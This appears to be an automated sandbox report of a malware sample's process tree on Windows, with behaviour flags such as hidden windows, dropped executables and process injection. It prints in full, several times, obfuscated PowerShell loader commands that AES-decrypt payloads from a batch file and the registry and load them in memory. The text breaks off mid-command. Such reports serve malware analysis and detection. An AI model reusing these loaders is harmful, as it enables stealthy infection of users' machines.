C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2532

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3272

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3600

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:560
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4304
- - C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe
    "Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $WOPSU = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($hZSOM in $WOPSU) { if ($hZSOM.StartsWith(':: ')) { $WUBQW = $hZSOM.Substring(3); break; }; };$TltnC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($WUBQW);$hiWzu = New-Object System.Security.Cryptography.AesManaged;$hiWzu.Mode = [System.Security.Cryptography.CipherMode]::CBC;$hiWzu.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$hiWzu.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R+7km1Kng+Tk/g22yIYfJi3KNN0y7ahu3CCAqlAFHj4=');$hiWzu.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W5Ypky4J6VtH280ftgrmGw==');$UBSjF = $hiWzu.CreateDecryptor();$TltnC = $UBSjF.TransformFinalBlock($TltnC, 0, $TltnC.Length);$UBSjF.Dispose();$hiWzu.Dispose();$qWlQq = New-Object System.IO.MemoryStream(, $TltnC);$wGZkP = New-Object System.IO.MemoryStream;$nddmN = New-Object System.IO.Compression.GZipStream($qWlQq, [IO.Compression.CompressionMode]::Decompress);$nddmN.CopyTo($wGZkP);$nddmN.Dispose();$qWlQq.Dispose();$wGZkP.Dispose();$TltnC = $wGZkP.ToArray();$zfuyh = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($TltnC);$qykKF = $zfuyh.EntryPoint;$qykKF.Invoke($null, (, [string[]] ('')))
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Checks computer location settings
    - Deletes itself
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3476
  - - C:\Windows\$sxr-powershell.exe
      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command $aUyxc1 = New-Object System.Security.Cryptography.AesManaged;$aUyxc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$MIdLG = $aUyxc1.('rotpyrceDetaerC'[-1..-15] -join '')();$Fefhh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kacTDFH7euHOedo7fwIWWg==');$Fefhh = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh, 0, $Fefhh.Length);$Fefhh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh);$kujZJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0ykf07DVvNskVBPWRZprpGZ1fAt3J1q/qJFaWbyL574=');$kujZJ = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kujZJ, 0, $kujZJ.Length);$kujZJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kujZJ);$NmvlL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CRRXM75ZrsUhJMCFqePWuQ==');$NmvlL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NmvlL, 0, $NmvlL.Length);$NmvlL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NmvlL);$nLQSD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GS0bmvOUap5I6ORyZtBh6ZQmXnalFFGi6/Y7E52AWCaqNDT6fxK4gHBWR3r4s3xCkXx9VWFEf2w3R2WVc3J60OnBY32UVSpUWOF8zysHXTFxBiXUIIOqojKckMm4XOltHp6MNoJ9fC+ewBdsTVHTUwKZ0aVnvoVDrPGjrp1fhLllj38OsTbmh4h6eJM6Yp+iiFdKlQdoGBlK1wu+bCD1xhfQ7VLVa0S3zaiPvFpgbIyOYBCP5CWPRgWoIMmOb9cuYTS/bouRVbJIaaJIheDP7AqK+2mSTQgMjKS9NgKgwowvGzhVU82j9ZbFQe6zb/Slvf65CQUf4UdZ/2cXkiMyGp3tY21l4wBgIghpC3iFnD87WmLsT7yOhnY15Z370q2UEsaBuC+b8lOt42PzfdJzkDra3td3QFUtcWjLAN9qSP8=');$nLQSD = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nLQSD, 0, $nLQSD.Length);$nLQSD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nLQSD);$dCPnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IQxnPlY0pUcPW0QRSrEFag==');$dCPnP = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dCPnP, 0, $dCPnP.Length);$dCPnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dCPnP);$BjALC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aIfIjghfGVJtu04srrjCrw==');$BjALC = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BjALC, 0, $BjALC.Length);$BjALC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BjALC);$GvZOL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TsJQJdbflklVcbuxDdE/ig==');$GvZOL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GvZOL, 0, $GvZOL.Length);$GvZOL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GvZOL);$fAcMg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEZNJsF5SJYqVUT/2Xu3ww==');$fAcMg = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fAcMg, 0, $fAcMg.Length);$fAcMg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fAcMg);$XwAut = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XlCtXzJxTmuEST/jokQ+pA==');$XwAut = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XwAut, 0, $XwAut.Length);$XwAut = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XwAut);$Fefhh0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Gbxsp83W2G+qV7IdPS3JA==');$Fefhh0 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh0, 0, $Fefhh0.Length);$Fefhh0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh0);$Fefhh1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5B7Nkbhr9v5gOMD6+/vxEQ==');$Fefhh1 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh1, 0, $Fefhh1.Length);$Fefhh1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh1);$Fefhh2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cPaOl9iz80JefOsJ4GC31g==');$Fefhh2 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh2, 0, $Fefhh2.Length);$Fefhh2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh2);$Fefhh3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XbnoaTEasEFT/t1P4h+seQ==');$Fefhh3 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh3, 0, $Fefhh3.Length);$Fefhh3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh3);$MIdLG.Dispose();$aUyxc1.Dispose();$szZfE = [Microsoft.Win32.Registry]::$fAcMg.$GvZOL($Fefhh).$BjALC($kujZJ);$qaEKQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($szZfE);$aUyxc = New-Object System.Security.Cryptography.AesManaged;$aUyxc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$GbvTI = $aUyxc.('rotpyrceDetaerC'[-1..-15] -join '')();$qaEKQ = $GbvTI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qaEKQ, 0, $qaEKQ.Length);$GbvTI.Dispose();$aUyxc.Dispose();$xvhuX = New-Object System.IO.MemoryStream(, $qaEKQ);$wJSbI = New-Object System.IO.MemoryStream;$RIKgg = New-Object System.IO.Compression.GZipStream($xvhuX, [IO.Compression.CompressionMode]::$Fefhh1);$RIKgg.$XwAut($wJSbI);$RIKgg.Dispose();$xvhuX.Dispose();$wJSbI.Dispose();$qaEKQ = $wJSbI.ToArray();$VgaAf = $nLQSD | IEX;$dYcrb = $VgaAf::$Fefhh2($qaEKQ);$UwoNE = $dYcrb.EntryPoint;$UwoNE.$Fefhh0($null, (, [string[]] ($NmvlL)))
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Checks computer location settings
      Executes dropped EXE
      Hide Artifacts: Hidden Window
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1136
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1136).WaitForExit();[System.Threading.Thread]::Sleep(5000); $aUyxc1 = New-Object System.Security.Cryptography.AesManaged;$aUyxc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$MIdLG = $aUyxc1.('rotpyrceDetaerC'[-1..-15] -join '')();$Fefhh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kacTDFH7euHOedo7fwIWWg==');$Fefhh = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh, 0, $Fefhh.Length);$Fefhh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh);$kujZJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0ykf07DVvNskVBPWRZprpGZ1fAt3J1q/qJFaWbyL574=');$kujZJ = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kujZJ, 0, $kujZJ.Length);$kujZJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kujZJ);$NmvlL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CRRXM75ZrsUhJMCFqePWuQ==');$NmvlL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NmvlL, 0, $NmvlL.Length);$NmvlL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NmvlL);$nLQSD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GS0bmvOUap5I6ORyZtBh6ZQmXnalFFGi6/Y7E52AWCaqNDT6fxK4gHBWR3r4s3xCkXx9VWFEf2w3R2WVc3J60OnBY32UVSpUWOF8zysHXTFxBiXUIIOqojKckMm4XOltHp6MNoJ9fC+ewBdsTVHTUwKZ0aVnvoVDrPGjrp1fhLllj38OsTbmh4h6eJM6Yp+iiFdKlQdoGBlK1wu+bCD1xhfQ7VLVa0S3zaiPvFpgbIyOYBCP5CWPRgWoIMmOb9cuYTS/bouRVbJIaaJIheDP7AqK+2mSTQgMjKS9NgKgwowvGzhVU82j9ZbFQe6zb/Slvf65CQUf4UdZ/2cXkiMyGp3tY21l4wBgIghpC3iFnD87WmLsT7yOhnY15Z370q2UEsaBuC+b8lOt42PzfdJzkDra3td3QFUtcWjLAN9qSP8=');$nLQSD = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nLQSD, 0, $nLQSD.Length);$nLQSD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nLQSD);$dCPnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IQxnPlY0pUcPW0QRSrEFag==');$dCPnP = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dCPnP, 0, $dCPnP.Length);$dCPnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dCPnP);$BjALC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aIfIjghfGVJtu04srrjCrw==');$BjALC = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BjALC, 0, $BjALC.Length);$BjALC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BjALC);$GvZOL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TsJQJdbflklVcbuxDdE/ig==');$GvZOL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GvZOL, 0, $GvZOL.Length);$GvZOL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GvZOL);$fAcMg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEZNJsF5SJYqVUT/2Xu3ww==');$fAcMg = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fAcMg, 0, $fAcMg.Length);$fAcMg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fAcMg);$XwAut = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XlCtXzJxTmuEST/jokQ+pA==');$XwAut = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XwAut, 0, $XwAut.Length);$XwAut = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XwAut);$Fefhh0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Gbxsp83W2G+qV7IdPS3JA==');$Fefhh0 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh0, 0, $Fefhh0.Length);$Fefhh0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh0);$Fefhh1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5B7Nkbhr9v5gOMD6+/vxEQ==');$Fefhh1 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh1, 0, $Fefhh1.Length);$Fefhh1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh1);$Fefhh2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cPaOl9iz80JefOsJ4GC31g==');$Fefhh2 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh2, 0, $Fefhh2.Length);$Fefhh2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh2);$Fefhh3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XbnoaTEasEFT/t1P4h+seQ==');$Fefhh3 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh3, 0, $Fefhh3.Length);$Fefhh3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh3);$MIdLG.Dispose();$aUyxc1.Dispose();$szZfE = [Microsoft.Win32.Registry]::$fAcMg.$GvZOL($Fefhh).$BjALC($kujZJ);$qaEKQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($szZfE);$aUyxc = New-Object System.Security.Cryptography.AesManaged;$aUyxc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$GbvTI = $aUyxc.('rotpyrceDetaerC'[-1..-15] -join '')();$qaEKQ = $GbvTI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qaEKQ, 0, $qaEKQ.Length);$GbvTI.Dispose();$aUyxc.Dispose();$xvhuX = New-Object System.IO.MemoryStream(, $qaEKQ);$wJSbI = New-Object System.IO.MemoryStream;$RIKgg = New-Object System.IO.Compression.GZipStream($xvhuX, [IO.Compression.CompressionMode]::$Fefhh1);$RIKgg.$XwAut($wJSbI);$RIKgg.Dispose();$xvhuX.Dispose();$wJSbI.Dispose();$qaEKQ = $wJSbI.ToArray();$VgaAf = $nLQSD | IEX;$dYcrb = $VgaAf::$Fefhh2($qaEKQ);$UwoNE = $dYcrb.EntryPoint;$UwoNE.$Fefhh0($null, (, [string[]] ($NmvlL)))
        5⤵
        Executes dropped EXE
        Hide Artifacts: Hidden Window
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3724
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1136).WaitForExit();[System.Threading.Thread]::Sleep(5000); $aUyxc1 = New-Object System.Security.Cryptography.AesManaged;$aUyxc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$MIdLG = $aUyxc1.('rotpyrceDetaerC'[-1..-15] -join '')();$Fefhh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kacTDFH7euHOedo7fwIWWg==');$Fefhh = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh, 0, $Fefhh.Length);$Fefhh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh);$kujZJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0ykf07DVvNskVBPWRZprpGZ1fAt3J1q/qJFaWbyL574=');$kujZJ = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kujZJ, 0, $kujZJ.Length);$kujZJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kujZJ);$NmvlL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CRRXM75ZrsUhJMCFqePWuQ==');$NmvlL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NmvlL, 0, $NmvlL.Length);$NmvlL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NmvlL);$nLQSD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GS0bmvOUap5I6ORyZtBh6ZQmXnalFFGi6/Y7E52AWCaqNDT6fxK4gHBWR3r4s3xCkXx9VWFEf2w3R2WVc3J60OnBY32UVSpUWOF8zysHXTFxBiXUIIOqojKckMm4XOltHp6MNoJ9fC+ewBdsTVHTUwKZ0aVnvoVDrPGjrp1fhLllj38OsTbmh4h6eJM6Yp+iiFdKlQdoGBlK1wu+bCD1xhfQ7VLVa0S3zaiPvFpgbIyOYBCP5CWPRgWoIMmOb9cuYTS/bouRVbJIaaJIheDP7AqK+2mSTQgMjKS9NgKgwowvGzhVU82j9ZbFQe6zb/Slvf65CQUf4UdZ/2cXkiMyGp3tY21l4wBgIghpC3iFnD87WmLsT7yOhnY15Z370q2UEsaBuC+b8lOt42PzfdJzkDra3td3QFUtcWjLAN9qSP8=');$nLQSD = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nLQSD, 0, $nLQSD.Length);$nLQSD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nLQSD);$dCPnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IQxnPlY0pUcPW0QRSrEFag==');$dCPnP = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dCPnP, 0, $dCPnP.Length);$dCPnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dCPnP);$BjALC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aIfIjghfGVJtu04srrjCrw==');$BjALC = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BjALC, 0, $BjALC.Length);$BjALC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BjALC);$GvZOL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TsJQJdbflklVcbuxDdE/ig==');$GvZOL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GvZOL, 0, $GvZOL.Length);$GvZOL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GvZOL);$fAcMg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEZNJsF5SJYqVUT/2Xu3ww==');$fAcMg = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fAcMg, 0, $fAcMg.Length);$fAcMg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fAcMg);$XwAut = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XlCtXzJxTmuEST/jokQ+pA==');$XwAut = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XwAut, 0, $XwAut.Length);$XwAut = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XwAut);$Fefhh0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Gbxsp83W2G+qV7IdPS3JA==');$Fefhh0 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh0, 0, $Fefhh0.Length);$Fefhh0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh0);$Fefhh1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5B7Nkbhr9v5gOMD6+/vxEQ==');$Fefhh1 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh1, 0, $Fefhh1.Length);$Fefhh1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh1);$Fefhh2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cPaOl9iz80JefOsJ4GC31g==');$Fefhh2 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh2, 0, $Fefhh2.Length);$Fefhh2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh2);$Fefhh3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XbnoaTEasEFT/t1P4h+seQ==');$Fefhh3 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh3, 0, $Fefhh3.Length);$Fefhh3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh3);$MIdLG.Dispose();$aUyxc1.Dispose();$szZfE = [Microsoft.Win32.Registry]::$fAcMg.$GvZOL($Fefhh).$BjALC($kujZJ);$qaEKQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($szZfE);$aUyxc = New-Object System.Security.Cryptography.AesManaged;$aUyxc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$GbvTI = $aUyxc.('rotpyrceDetaerC'[-1..-15] -join '')();$qaEKQ = $GbvTI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qaEKQ, 0, $qaEKQ.Length);$GbvTI.Dispose();$aUyxc.Dispose();$xvhuX = New-Object System.IO.MemoryStream(, $qaEKQ);$wJSbI = New-Object System.IO.MemoryStream;$RIKgg = New-Object System.IO.Compression.GZipStream($xvhuX, [IO.Compression.CompressionMode]::$Fefhh1);$RIKgg.$XwAut($wJSbI);$RIKgg.Dispose();$xvhuX.Dispose();$wJSbI.Dispose();$qaEKQ = $wJSbI.ToArray();$VgaAf = $nLQSD | IEX;$dYcrb = $VgaAf::$Fefhh2($qaEKQ);$UwoNE = $dYcrb.EntryPoint;$UwoNE.$Fefhh0($null, (, [string[]] ($NmvlL)))
        5⤵
        Executes dropped EXE
        Hide Artifacts: Hidden Window
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4144
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1136).WaitForExit();[System.Threading.Thread]::Sleep(5000); $aUyxc1 = New-Object System.Security.Cryptography.AesManaged;$aUyxc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$MIdLG = $aUyxc1.('rotpyrceDetaerC'[-1..-15] -join '')();$Fefhh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kacTDFH7euHOedo7fwIWWg==');$Fefhh = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh, 0, $Fefhh.Length);$Fefhh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh);$kujZJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0ykf07DVvNskVBPWRZprpGZ1fAt3J1q/qJFaWbyL574=');$kujZJ = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kujZJ, 0, $kujZJ.Length);$kujZJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kujZJ);$NmvlL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CRRXM75ZrsUhJMCFqePWuQ==');$NmvlL 